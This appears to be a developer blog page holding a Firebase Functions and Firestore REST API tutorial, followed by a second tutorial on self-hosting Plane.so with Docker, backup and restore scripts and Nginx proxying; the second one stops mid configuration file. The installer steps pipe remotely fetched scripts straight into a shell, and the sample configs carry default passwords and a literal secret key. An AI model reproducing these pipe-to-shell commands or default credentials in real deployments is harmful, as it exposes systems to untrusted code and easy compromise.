Functions is a serverless service provided by Google. You only need to write the program logic, and Google will automatically handle the server, execution environment, and you don’t have to worry about server scaling and traffic issues.
Firebase Functions are essentially Google Cloud Functions but can only be written in JavaScript (node.js). Although I haven’t tried it, if you use Google Cloud Functions and choose to write in another language while importing Firebase services, it should work as well.
For API usage, I can write a node.js file, get a real URL (e.g., my-project.cloudfunctions.net/getUser), and write the logic to obtain Request information and provide the corresponding Response.
I previously wrote an article about Google Functions: Using Python + Google Cloud Platform + Line Bot to Automate Routine Tasks
Firebase Functions must enable the Blaze plan (pay-as-you-go) to use.
Firebase Firestore is a NoSQL database used to store and manage data.
Combined with Firebase Functions, you can import Firestore during a Request to operate the database and then respond to the user, allowing you to build a simple Restful API service!
Let’s get hands-on!
It is recommended to use NVM, a node.js version management tool, for installation and management (similar to pyenv for Python).
Copy the installation shell script from the NVM GitHub project:
1
+
curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.37.2/install.sh | bash
+
If errors occur during installation, ensure you have a ~/.bashrc
or ~/.zshrc
file. If not, you can create one using touch ~/.bashrc
or touch ~/.zshrc
and then rerun the install script.
Next, you can use nvm install node
to install the latest version of node.js.
You can check if npm is installed successfully and its version by running npm --version
:
1
+
npm install -g firebase-tools
+
After successful installation, for the first-time use, enter:
1
+
firebase login
+
Complete Firebase login authentication.
Initialize the project:
1
+
firebase init
+
Note the path where Firebase init is located:
1
+
You're about to initialize a Firebase project in this directory:
+
Here you can choose the Firebase CLI tools to install. Use the “↑” and “↓” keys to navigate and the “spacebar” to select. You can choose to install only “Functions” or both “Functions” and “Firestore”.
=== Functions Setup
=== Emulators Setup
You can test Functions and Firestore features and settings locally without it counting towards usage and without needing to deploy online to test.
Install as needed. I installed it but didn’t use it… because it’s just a small feature.
Go to the path noted above, find the functions
folder, and open the index.js
file with an editor.
index.js:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+
const functions = require('firebase-functions');
+const admin = require('firebase-admin');
+admin.initializeApp();
+
+exports.hello = functions.https.onRequest((req, res) => {
+ const targetID = req.query.targetID
+ const action = req.body.action
+ const name = req.body.name
+
+ res.send({"targetID": targetID, "action": action, "name": name});
+ return
+})
+
Paste the above content. We have defined a path interface /hello
that will return the URL Query ?targetID=
, POST action
, and name
parameter information.
After modifying and saving, go back to the console and run:
1
+
firebase deploy
+
Remember to run the
firebase deploy
command every time you make changes for them to take effect.
Start verifying & deploying to Firebase…
It may take a while. After Deploy complete!
, your first Request & Response webpage is done!
At this point, you can go back to the Firebase -> Functions page:
You will see the interface and URL location you just wrote.
Copy the URL below and test it in PostMan:
Remember to select
x-www-form-urlencoded
for the POST Body.
Success!
We can use the following in the code to log records:
1
+
functions.logger.log("log:", value);
+
And view the log results in Firebase -> Functions -> Logs:
Create an API that can add, modify, delete, query articles, and like them.
We want to achieve the functionality design of a Restful API, so we can’t use the pure Path method from the above example. Instead, we need to use the Express
framework.
index.js:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+
const functions = require('firebase-functions');
+const admin = require('firebase-admin');
+const express = require('express');
+const cors = require('cors');
+const app = express();
+
+admin.initializeApp();
+app.use(cors({ origin: true }));
+
+// Insert
+app.post('/', async (req, res) => { // This POST refers to the HTTP Method POST
+ const title = req.body.title;
+ const content = req.body.content;
+ const author = req.body.author;
+
+ if (title == null || content == null || author == null) {
+ return res.status(400).send({"message":"Parameter error!"});
+ }
+
+ var post = {"title":title, "content":content, "author": author, "created_at": new Date()};
+ await admin.firestore().collection('posts').add(post);
+ res.status(201).send({"message":"Added successfully!"});
+});
+
+exports.post= functions.https.onRequest(app); // This POST refers to the /post path
+
Now we use Express to handle network requests. Here, we first add a POST
method for the path /
. The last line indicates that all paths are under /post
. Next, we will add APIs for updating and deleting.
After successfully deploying with firebase deploy
, go back to Post Man to test:
After successfully hitting Post Man, you can check in Firebase -> Firestore to see if the data is correctly written:
index.js:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+
const functions = require('firebase-functions');
+const admin = require('firebase-admin');
+const express = require('express');
+const cors = require('cors');
+const app = express();
+
+admin.initializeApp();
+app.use(cors({ origin: true }));
+
+// Update
+app.put("/:id", async (req, res) => {
+ const title = req.body.title;
+ const content = req.body.content;
+ const author = req.body.author;
+ const doc = await admin.firestore().collection('posts').doc(req.params.id).get();
+
+ if (!doc.exists) {
+ return res.status(404).send({"message":"Article not found!"});
+ } else if (title == null || content == null || author == null) {
+ return res.status(400).send({"message":"Invalid parameters!"});
+ }
+
+ var post = {"title":title, "content":content, "author": author};
+ await admin.firestore().collection('posts').doc(req.params.id).update(post);
+ res.status(200).send({"message":"Update successful!"});
+});
+
+exports.post= functions.https.onRequest(app);
+
Deployment & testing method is the same as adding, remember to change the Post Man Http Method to PUT
.
index.js:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+
const functions = require('firebase-functions');
+const admin = require('firebase-admin');
+const express = require('express');
+const cors = require('cors');
+const app = express();
+
+admin.initializeApp();
+app.use(cors({ origin: true }));
+
+// Delete
+app.delete("/:id", async (req, res) => {
+ const doc = await admin.firestore().collection('posts').doc(req.params.id).get();
+
+ if (!doc.exists) {
+ return res.status(404).send({"message":"Article not found!"});
+ }
+
+ await admin.firestore().collection("posts").doc(req.params.id).delete();
+ res.status(200).send({"message":"Article deleted successfully!"});
+})
+
+exports.post= functions.https.onRequest(app);
+
Deployment & testing method is the same as adding, remember to change the Post Man Http Method to DELETE
.
Adding, modifying, and deleting are done, let’s do the query!
index.js:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+
const functions = require('firebase-functions');
+const admin = require('firebase-admin');
+const express = require('express');
+const cors = require('cors');
+const app = express();
+
+admin.initializeApp();
+app.use(cors({ origin: true }));
+
+// Select List
+app.get('/', async (req, res) => {
+ const posts = await admin.firestore().collection('posts').get();
+ var result = [];
+ posts.forEach(doc => {
+ let id = doc.id;
+ let data = doc.data();
+ result.push({"id":id, ...data})
+ });
+ res.status(200).send({"result":result});
+});
+
+// Select One
+app.get("/:id", async (req, res) => {
+ const doc = await admin.firestore().collection('posts').doc(req.params.id).get();
+
+ if (!doc.exists) {
+ return res.status(404).send({"message":"Article not found!"});
+ }
+
+ res.status(200).send({"result":{"id":doc.id, ...doc.data()}});
+});
+
+exports.post= functions.https.onRequest(app);
+
Deployment & testing method is the same as adding, remember to change the Post Man Http Method to GET
and switch Body
back to none
.
Sometimes we need to update when the value exists and add when the value does not exist. In this case, we can use set
with merge: true
:
index.js:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+
const functions = require('firebase-functions');
+const admin = require('firebase-admin');
+const express = require('express');
+const cors = require('cors');
+const app = express();
+
+admin.initializeApp();
+app.use(cors({ origin: true }));
+
+// InsertOrUpdate
+app.post("/tag", async (req, res) => {
+ const name = req.body.name;
+
+ if (name == null) {
+ return res.status(400).send({"message":"Invalid parameter!"});
+ }
+
+ var tag = {"name":name};
+ await admin.firestore().collection('tags').doc(name).set({created_at: new Date()}, {merge: true});
+ res.status(201).send({"message":"Added successfully!"});
+});
+
+exports.post= functions.https.onRequest(app);
+
Here, taking adding a tag as an example, the deployment & testing method is the same as adding. You can see that Firestore will not repeatedly add new data.
Suppose our article data now has an additional likeCount
field to record the number of likes. How should we do it?
index.js:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+
const functions = require('firebase-functions');
+const admin = require('firebase-admin');
+const express = require('express');
+const cors = require('cors');
+const app = express();
+
+admin.initializeApp();
+app.use(cors({ origin: true }));
+
+// Like Post
+app.post("/like/:id", async (req, res) => {
+ const doc = await admin.firestore().collection('posts').doc(req.params.id).get();
+ const increment = admin.firestore.FieldValue.increment(1)
+
+ if (!doc.exists) {
+ return res.status(404).send({"message":"Article not found!"});
+ }
+
+ await admin.firestore().collection('posts').doc(req.params.id).set({likeCount: increment}, {merge: true});
+ res.status(201).send({"message":"Liked successfully!"});
+});
+
+exports.post= functions.https.onRequest(app);
+
Using the increment
variable allows you to directly perform the action of retrieving the value +1.
Because Firestore has write speed limits:
A document can only be written once per second, so when there are many people liking it; simultaneous requests may become very slow.
The official solution “ Distributed counters “ is actually not very advanced technology, it just uses several distributed likeCount fields to count, and then sums them up when reading.
index.js:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+
const functions = require('firebase-functions');
+const admin = require('firebase-admin');
+const express = require('express');
+const cors = require('cors');
+const app = express();
+
+admin.initializeApp();
+app.use(cors({ origin: true }));
+
+// Distributed counters Like Post
+app.post("/like2/:id", async (req, res) => {
+ const doc = await admin.firestore().collection('posts').doc(req.params.id).get();
+ const increment = admin.firestore.FieldValue.increment(1)
+
+ if (!doc.exists) {
+ return res.status(404).send({"message":"Article not found!"});
+ }
+
+ //1~10
+ await admin.firestore().collection('posts').doc(req.params.id).collection("likeCounter").doc("likeCount_"+(Math.floor(Math.random()*10)+1).toString())
+ .set({count: increment}, {merge: true});
+ res.status(201).send({"message":"Like successful!"});
+});
+
+
+exports.post= functions.https.onRequest(app);
+
The above is to distribute the fields to record Count to avoid slow writing; but if there are too many distributed fields, it will increase the reading cost ($$), but it should still be cheaper than adding a new record for each like.
Use brew
to install siege
1
+
brew install siege
+
p.s If you encounter brew: command not found, please install the brew package management tool first:
1
+
/usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"
+
After installation, you can run:
1
+
siege -c 100 -r 1 -H 'Content-Type: application/json' 'https://us-central1-project.cloudfunctions.net/post/like/id POST {}'
+
Perform stress testing:
-c 100
: 100 tasks executed simultaneously-r 1
: Each task executes 1 request-H ‘Content-Type: application/json’
: Required if it is a POST‘https://us-central1-project.cloudfunctions.net/post/like/id POST {}’
: POST URL, Post Body (ex: {“name”:”1234”}
)After execution, you can see the results:
successful_transactions: 100
indicates that all 100 transactions were successful.
You can go back to Firebase -> Firestore to check if there is any Loss Data:
Success!
index.js:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+50
+51
+52
+53
+54
+55
+56
+57
+58
+59
+60
+61
+62
+63
+64
+65
+66
+67
+68
+69
+70
+71
+72
+73
+74
+75
+76
+77
+78
+79
+80
+81
+82
+83
+84
+85
+86
+87
+88
+89
+90
+91
+92
+93
+94
+95
+96
+97
+98
+99
+100
+101
+102
+103
+104
+105
+106
+107
+108
+109
+110
+111
+112
+113
+114
+115
+116
+117
+118
+119
+120
+
const functions = require('firebase-functions');
+const admin = require('firebase-admin');
+const express = require('express');
+const cors = require('cors');
+const app = express();
+
+admin.initializeApp();
+app.use(cors({ origin: true }));
+
+// Insert
+app.post('/', async (req, res) => {
+ const title = req.body.title;
+ const content = req.body.content;
+ const author = req.body.author;
+
+ if (title == null || content == null || author == null) {
+ return res.status(400).send({"message":"Parameter error!"});
+ }
+
+ var post = {"title":title, "content":content, "author": author, "created_at": new Date()};
+ await admin.firestore().collection('posts').add(post);
+ res.status(201).send({"message":"Successfully added!"});
+});
+
+// Update
+app.put("/:id", async (req, res) => {
+ const title = req.body.title;
+ const content = req.body.content;
+ const author = req.body.author;
+ const doc = await admin.firestore().collection('posts').doc(req.params.id).get();
+
+ if (!doc.exists) {
+ return res.status(404).send({"message":"Post not found!"});
+ } else if (title == null || content == null || author == null) {
+ return res.status(400).send({"message":"Parameter error!"});
+ }
+
+ var post = {"title":title, "content":content, "author": author};
+ await admin.firestore().collection('posts').doc(req.params.id).update(post);
+ res.status(200).send({"message":"Successfully updated!"});
+});
+
+// Delete
+app.delete("/:id", async (req, res) => {
+ const doc = await admin.firestore().collection('posts').doc(req.params.id).get();
+
+ if (!doc.exists) {
+ return res.status(404).send({"message":"Post not found!"});
+ }
+
+ await admin.firestore().collection("posts").doc(req.params.id).delete();
+ res.status(200).send({"message":"Post successfully deleted!"});
+});
+
+// Select List
+app.get('/', async (req, res) => {
+ const posts = await admin.firestore().collection('posts').get();
+ var result = [];
+ posts.forEach(doc => {
+ let id = doc.id;
+ let data = doc.data();
+ result.push({"id":id, ...data})
+ });
+ res.status(200).send({"result":result});
+});
+
+// Select One
+app.get("/:id", async (req, res) => {
+ const doc = await admin.firestore().collection('posts').doc(req.params.id).get();
+
+ if (!doc.exists) {
+ return res.status(404).send({"message":"Post not found!"});
+ }
+
+ res.status(200).send({"result":{"id":doc.id, ...doc.data()}});
+});
+
+// InsertOrUpdate
+app.post("/tag", async (req, res) => {
+ const name = req.body.name;
+
+ if (name == null) {
+ return res.status(400).send({"message":"Parameter error!"});
+ }
+
+ var tag = {"name":name};
+ await admin.firestore().collection('tags').doc(name).set({created_at: new Date()}, {merge: true});
+ res.status(201).send({"message":"Successfully added!"});
+});
+
+// Like Post
+app.post("/like/:id", async (req, res) => {
+ const doc = await admin.firestore().collection('posts').doc(req.params.id).get();
+ const increment = admin.firestore.FieldValue.increment(1)
+
+ if (!doc.exists) {
+ return res.status(404).send({"message":"Post not found!"});
+ }
+
+ await admin.firestore().collection('posts').doc(req.params.id).set({likeCount: increment}, {merge: true});
+ res.status(201).send({"message":"Successfully liked!"});
+});
+
+// Distributed counters Like Post
+app.post("/like2/:id", async (req, res) => {
+ const doc = await admin.firestore().collection('posts').doc(req.params.id).get();
+ const increment = admin.firestore.FieldValue.increment(1)
+
+ if (!doc.exists) {
+ return res.status(404).send({"message":"Post not found!"});
+ }
+
+ //1~10
+ await admin.firestore().collection('posts').doc(req.params.id).collection("likeCounter").doc("likeCount_"+(Math.floor(Math.random()*10)+1).toString())
+ .set({count: increment}, {merge: true});
+ res.status(201).send({"message":"Successfully liked!"});
+});
+
+
+exports.post= functions.https.onRequest(app);
+
Back to what we initially wanted to do, the push notification statistics feature.
index.js:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+
const functions = require('firebase-functions');
+const admin = require('firebase-admin');
+const express = require('express');
+const cors = require('cors');
+const app = express();
+
+admin.initializeApp();
+app.use(cors({ origin: true }));
+
+const vaildPlatformTypes = ["ios","Android"]
+const vaildActionTypes = ["clicked","received"]
+
+// Insert Log
+app.post('/', async (req, res) => {
+ const increment = admin.firestore.FieldValue.increment(1);
+ const platformType = req.body.platformType;
+ const pushID = req.body.pushID;
+ const actionType = req.body.actionType;
+
+ if (!vaildPlatformTypes.includes(platformType) || pushID == undefined || !vaildActionTypes.includes(actionType)) {
+ return res.status(400).send({"message":"Invalid parameters!"});
+ } else {
+ await admin.firestore().collection(platformType).doc(actionType+"_"+pushID).collection("shards").doc((Math.floor(Math.random()*10)+1).toString())
+ .set({count: increment}, {merge: true})
+ res.status(201).send({"message":"Record successful!"});
+ }
+});
+
+// View Log
+app.get('/:type/:id', async (req, res) => {
+ // received
+ const receivedDocs = await admin.firestore().collection(req.params.type).doc("received_"+req.params.id).collection("shards").get();
+ var received = 0;
+ receivedDocs.forEach(doc => {
+ received += doc.data().count;
+ });
+
+ // clicked
+ const clickedDocs = await admin.firestore().collection(req.params.type).doc("clicked_"+req.params.id).collection("shards").get();
+ var clicked = 0;
+ clickedDocs.forEach(doc => {
+ clicked += doc.data().count;
+ });
+
+ res.status(200).send({"received":received,"clicked":clicked});
+});
+
+exports.notification = functions.https.onRequest(app);
+
1
+
https://us-centra1-xxx.cloudfunctions.net/notification/iOS/1
+
Additionally, we also created an interface to count push notification numbers.
Since I am not very familiar with node.js, during the initial exploration, I did not add
await
when adding data. Coupled with the write speed limit, it led to Data Loss under high traffic conditions…
Don’t forget to refer to the pricing strategy for Firebase Functions & Firestore.
Computation Time
Network
Cloud Functions offers a permanent free tier for computation time resources, which includes GB/seconds and GHz/seconds of computation time. In addition to 2 million invocations, the free tier also provides 400,000 GB/seconds and 200,000 GHz/seconds of computation time, as well as 5 GB of internet egress per month.
Prices are subject to change at any time, please refer to the official website for the latest information.
As the title suggests, “for testing”, “for testing”, “for testing” it is not recommended to use the above services in a production environment or as the core of a product launch.
I once heard that a fairly large service was built using Firebase services, and later on, with large data and traffic, the charges became extremely expensive; it was also very difficult to migrate, the code was okay but the data was very hard to move; it can only be said that saving a little money in the early stages caused huge losses later on, not worth it.
For the above reasons, I personally recommend using Firebase Functions + Firestore to build API services only for testing or prototype product demonstrations.
Functions can also integrate Authentication, Storage, but I haven’t researched this part.
If you have any questions or suggestions, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
Plane Self-Hosted Docker setup, backup, restore, Nginx Domain reverse proxy configuration tutorial
Plane.so is a free open-source project management tool similar to Asana, Jira, Clickup that supports Self-Hosted setup. It was established in 2022, with the first version released in 2023, and is still under development.
For detailed usage and development process integration, please refer to the previous article “Plane.so Free Open-Source Project Management Tool Similar to Asana/Jira that Supports Self-Hosted”. This article only records the process of setting up Plane.so using Docker.
Docker Compose - Plane In this guide, we will walk you through the process of setting up a self-hosted environment. Self-hosting allows you to… docs.plane.so
We have seen performance degradation beyond 50 users on our recommended 4 GB, 2vCPU infra. Increased infra will help with more users.
This article does not provide an introduction, please refer to the official Docker installation method to complete the local Docker environment installation and configuration. The following takes macOS Docker as an example.
Refer to the official manual.
1
+2
+3
+4
+5
+6
+7
+
mkdir plane-selfhost
+
+cd plane-selfhost
+
+curl -fsSL -o setup.sh https://raw.githubusercontent.com/makeplane/plane/master/deploy/selfhost/install.sh
+
+chmod +x setup.sh
+
1
+
./setup.sh
+
1
to install (download images)./plane-app
folder and open the .env
configuration file1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+
APP_RELEASE=stable
+
+WEB_REPLICAS=1
+SPACE_REPLICAS=1
+ADMIN_REPLICAS=1
+API_REPLICAS=1
+
+NGINX_PORT=80
+WEB_URL=http://localhost
+DEBUG=0
+SENTRY_DSN=
+SENTRY_ENVIRONMENT=production
+CORS_ALLOWED_ORIGINS=http://localhost
+
+#DB SETTINGS
+PGHOST=plane-db
+PGDATABASE=plane
+POSTGRES_USER=plane
+POSTGRES_PASSWORD=plane
+POSTGRES_DB=plane
+POSTGRES_PORT=5432
+PGDATA=/var/lib/postgresql/data
+DATABASE_URL=
+
+# REDIS SETTINGS
+REDIS_HOST=plane-redis
+REDIS_PORT=6379
+REDIS_URL=
+
+# Secret Key
+SECRET_KEY=60gp0byfz2dvffa45cxl20p1scy9xbpf6d8c5y0geejgkyp1b5
+
+# DATA STORE SETTINGS
+USE_MINIO=1
+AWS_REGION=
+AWS_ACCESS_KEY_ID=access-key
+AWS_SECRET_ACCESS_KEY=secret-key
+AWS_S3_ENDPOINT_URL=http://plane-minio:9000
+AWS_S3_BUCKET_NAME=uploads
+MINIO_ROOT_USER=access-key
+MINIO_ROOT_PASSWORD=secret-key
+BUCKET_NAME=uploads
+FILE_SIZE_LIMIT=5242880
+
+# Gunicorn Workers
+GUNICORN_WORKERS=1
+
+# UNCOMMENT `DOCKER_PLATFORM` IF YOU ARE ON `ARM64` AND DOCKER IMAGE IS NOT AVAILABLE FOR RESPECTIVE `APP_RELEASE`
+# DOCKER_PLATFORM=linux/amd64
+
:80
. If there is a conflict, you can change the port.docker-compose.yml
as it will be overwritten during future Plane updates)./setup.sh
again2
to start Plane:/
god-mode/
for initial setup:Instance not configured. Please contact your administrator.
```You can access the Plane admin interface at the URL /god-mode/
. Here you can configure the entire Plane service environment.
General settings.
If you don’t want to set up your own SMTP Server, you can use GMAIL SMTP directly to send emails:
smtp.gmail.com
465
noreply@zhgchg.li
Additionally, since Plane does not currently support Slack notifications, you could set up an SMTP Server shell to convert email notifications to Slack notifications using a Python script.
Plane service login authentication method. If you want to bind it to only allow email accounts within a Google organization, you can disable “Password based login” and enable only “Google” login. Then generate a login app that is restricted to organizational accounts from the Google login settings.
AI-related settings. Currently, its functionality is limited. If you have a key, you can use AI to help write Issue Descriptions on Issues.
Similarly, its functionality is currently limited. If you have an Unsplash Key, you can fetch and apply images through the Unsplash API when selecting project cover images.
⚠️⚠️Disclaimer⚠️⚠️
The above is an introduction to the 2024-05-25 v0.20-Dev version. The official team is actively developing new features and optimizing user experience. Please refer to the latest version settings.
Once the God/Admin Mode settings are configured, you can use it similarly to the Cloud version.
For detailed usage operations and integration with the development process, please refer to the previous article “ Plane.so Free and Open Source Self-Hosted Asana/Jira-like Project Management Tool “
As mentioned earlier, Plane is still in the development stage, with new versions released approximately every two to three weeks. The changes can be quite significant; it is recommended to read the Release Note carefully for changes and necessary adjustments before upgrading.
⚠️Be sure to back up before upgrading!⚠️ After upgrading, be sure to check if the scheduled backup script is still functioning properly.
⚠️Be sure to back up before upgrading!⚠️ After upgrading, be sure to check if the scheduled backup script is still functioning properly.
⚠️Be sure to back up before upgrading!⚠️ After upgrading, be sure to check if the scheduled backup script is still functioning properly.
Because Plane is in the development stage and unstable, we cannot guarantee that upgrades will not cause data loss. Therefore, it is recommended to back up before operating. The backup method will be explained below.
Upgrade Method:
./setup.sh
5
to upgrade Plane (this essentially just pulls new images and restarts).env
file may change after the upgrade, please refer to the Release Note for adjustmentsStarting from 0.20-dev
, ./setup.sh
adds a Backup Data command, but reading the official manual only mentions how to restore Backup Data to their One paid service. Therefore, I still use my own method to back up uploaded files, Redis, and backup the Postgresql Docker Container.
./plane-backup.sh
:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+50
+51
+52
+53
+54
+55
+56
+57
+58
+59
+60
+61
+62
+63
+64
+65
+66
+67
+
#!/bin/bash
+
+# Backup Plane data
+# Author: zhgchgli (https://zhgchg.li)
+
+##### Execution Method
+# ./plane-backup.sh [backup target directory path] [Plane's Docker project name] [maximum number of Plane backup files to keep, delete the oldest if exceeded]
+# e.g. ./plane-backup.sh /backup/plane plane-app 14
+###### Settings
+
+# Backup target directory
+backup_dir=${1:-.}
+
+# Plane's Docker project name
+docker_project_name=${2:-"plane-app"}
+
+# Maximum number of Plane backup files to keep, delete the oldest if exceeded
+keep_count=${3:-7}
+
+######
+
+# Check if the directory exists
+if [ ! -d "$backup_dir" ]; then
+ echo "Backup failed, directory does not exist: $backup_dir"
+ exit;
+fi
+
+# Remove oldest
+count=$(find "$backup_dir" -mindepth 1 -type d | wc -l)
+
+while [ "$count" -ge $keep_count ]; do
+ oldest_dir=$(find "$backup_dir" -mindepth 1 -maxdepth 1 -type d | while read dir; do
+ # Use stat command to get modification time
+ if [[ "$OSTYPE" == "darwin"* ]]; then
+ # macOS system
+ echo "$(stat -f %m "$dir") $dir"
+ else
+ # Linux system
+ echo "$(stat -c %Y "$dir") $dir"
+ fi
+ done | sort -n | head -n 1 | cut -d ' ' -f 2-)
+
+ echo "Remove oldest backup: $oldest_dir"
+ rm -rf "$oldest_dir"
+
+ count=$(find "$backup_dir" -mindepth 1 -type d | wc -l)
+done
+#
+
+# Backup new
+date_dir=$(date "+%Y_%m_%d_%H_%M_%S")
+target_dir="$backup_dir/$date_dir"
+
+mkdir -p "$target_dir"
+
+echo "Backing up to: $target_dir"
+
+# Plane's Postgresql .SQL dump
+docker exec -i $docker_project_name-plane-db-1 pg_dump --dbname=postgresql://plane:plane@plane-db/plane -c > $target_dir/dump.sql
+
+# Plane's redis
+docker run --rm -v $docker_project_name-redis-1:/volume -v $target_dir:/backup ubuntu tar cvf /backup/plane-app_redis.tar /volume > /dev/null 2>&1
+
+# Plane's uploaded files
+docker run --rm -v ${docker_project_name}_uploads:/volume -v $target_dir:/backup ubuntu tar cvf /backup/plane-app_uploads.tar /volume > /dev/null 2>&1
+
+echo "Backup Success!"
+
First time creating a Script file, remember to: chmod +x ./plane-backup.sh
Execution method:
1
+
./plane-backup.sh [Backup target folder path] [Plane Docker project name] [Maximum number of Plane backup files to retain, delete the oldest backup if exceeded]
+
/backup/plane/
or ./
Execution example:
1
+
./plane-backup.sh /backup/plane plane-app 14
+
Simply add the above command to Crontab to automatically backup Plane at regular intervals.
If you encounter execution errors and cannot find the Container, please check the Plane Docker Compose Project name or verify the script and Docker container names (the official names might have changed).
./plane-restore.sh
:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+50
+51
+52
+53
+54
+55
+56
+57
+58
+
#!/bin/bash
+
+# Restore Plane backup data
+# Author: zhgchgli (https://zhgchg.li)
+
+##### Execution method
+# ./plane-restore.sh
+
+#
+inputBackupDir() {
+ read -p "Enter the Plane backup folder to restore (e.g. /backup/plane/2024_05_25_19_14_12): " backup_dir
+}
+inputBackupDir
+
+if [[ -z $backup_dir ]]; then
+ echo "Please provide the backup folder (e.g. sh /backup/docker/plane/2024_04_09_17_46_39)"
+ exit;
+fi
+
+inputDockerProjectName() {
+ read -p "Plane Docker project name (leave blank to use default plane-app): " input_docker_project_name
+}
+inputDockerProjectName
+
+docker_project_name=${input_docker_project_name:-"plane-app"}
+
+confirm() {
+ read -p "Are you sure you want to restore Plane.so data? [y/N] " response
+
+ # Check the response
+ case "$response" in
+ [yY][eE][sS]|[yY])
+ true
+ ;;
+ *)
+ false
+ ;;
+ esac
+}
+
+if ! confirm; then
+ echo "Action cancelled."
+ exit
+fi
+
+# Restore
+
+echo "Restoring..."
+
+docker cp $backup_dir/dump.sql $docker_project_name-plane-db-1:/dump.sql && docker exec -i $docker_project_name-plane-db-1 psql postgresql://plane:plane@plane-db/plane -f /dump.sql
+
+# Restore Redis
+docker run --rm -v ${docker_project_name}-redis-1:/volume -v $backup_dir:/backup alpine tar xf /backup/plane-app_redis.tar --strip-component=1 -C /volume
+
+# Restore uploaded files
+docker run --rm -v ${docker_project_name}_uploads:/volume -v $backup_dir:/backup alpine tar xf /backup/plane-app_uploads.tar --strip-component=1 -C /volume
+
+echo "Restore Success!"
+
The first time you create a Script file, remember to: chmod +x ./plane-restore.sh
Execution method:
1
+2
+3
+4
+
./plane-restore.sh
+Input: The folder of the Plane backup file to be restored (e.g. /backup/plane/2024_05_25_19_14_12)
+Input: The Docker project name of Plane (leave blank to use the default plane-app)
+Input: Are you sure you want to execute Restore Plane.so data? [y/N] y
+
After seeing Restore Success!
, you need to restart Plane for it to take effect.
Use Plane ./setup.sh
and input 4
Restart:
Go back to the website, refresh, and log in to the Workspace to check if the restoration was successful:
Done!
⚠️ It is recommended to regularly test the backup and restore process to ensure that the backup can be used in case of an emergency.
As mentioned earlier, Plane is still in the development stage, and a new version is released approximately every two to three weeks, with potentially significant changes. It is recommended to read the Release Note carefully for changes and necessary adjustments before upgrading.
⚠️ Be sure to back up before upgrading! ⚠️ After upgrading, be sure to check if the scheduled backup script is still functioning properly.
⚠️ Be sure to back up before upgrading! ⚠️ After upgrading, be sure to check if the scheduled backup script is still functioning properly.
⚠️ Be sure to back up before upgrading! ⚠️ After upgrading, be sure to check if the scheduled backup script is still functioning properly.
Since Plane is in the development stage and unstable, it cannot be guaranteed that upgrading will not cause data loss. Therefore, it is recommended to back up before operating.
Upgrade method:
./setup.sh
again5
to upgrade Plane (this essentially just pulls the new Images & restarts).env
file may change after the upgrade, please refer to the Release Note for adjustmentsBecause we may have multiple web services to provide at the same time, such as: Self-Hosted LibreChat (ChatGPT), Self-Hosted Wiki.js, Self-Hosted Bitwarden, etc., each service requires port 80 by default. If we do not want to specify the port in the URL when using it, we need to start a Docker Nginx as a reverse proxy for web services.
The effect is as follows:
1
+2
+3
+4
+5
+
chat.zhgchg.li -> LibreChat :8082
+wiki.zhgchg.li -> Wiki.js :8083
+pwd.zhgchg.li -> Bitwarden :8084
+
+plane.zhgchg.li -> Plane.so :8081
+
To achieve the above effect, you need to move the ./plane-selfhost
directory to a unified directory, named webServices
here.
Final directory structure preview:
Adjust the webServices/plane-selfhost/plane-app/.env
environment configuration file:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+
APP_RELEASE=stable
+
+WEB_REPLICAS=1
+SPACE_REPLICAS=1
+ADMIN_REPLICAS=1
+API_REPLICAS=1
+
+NGINX_PORT=8081
+WEB_URL=http://plane.zhgchg.li
+DEBUG=0
+SENTRY_DSN=
+SENTRY_ENVIRONMENT=production
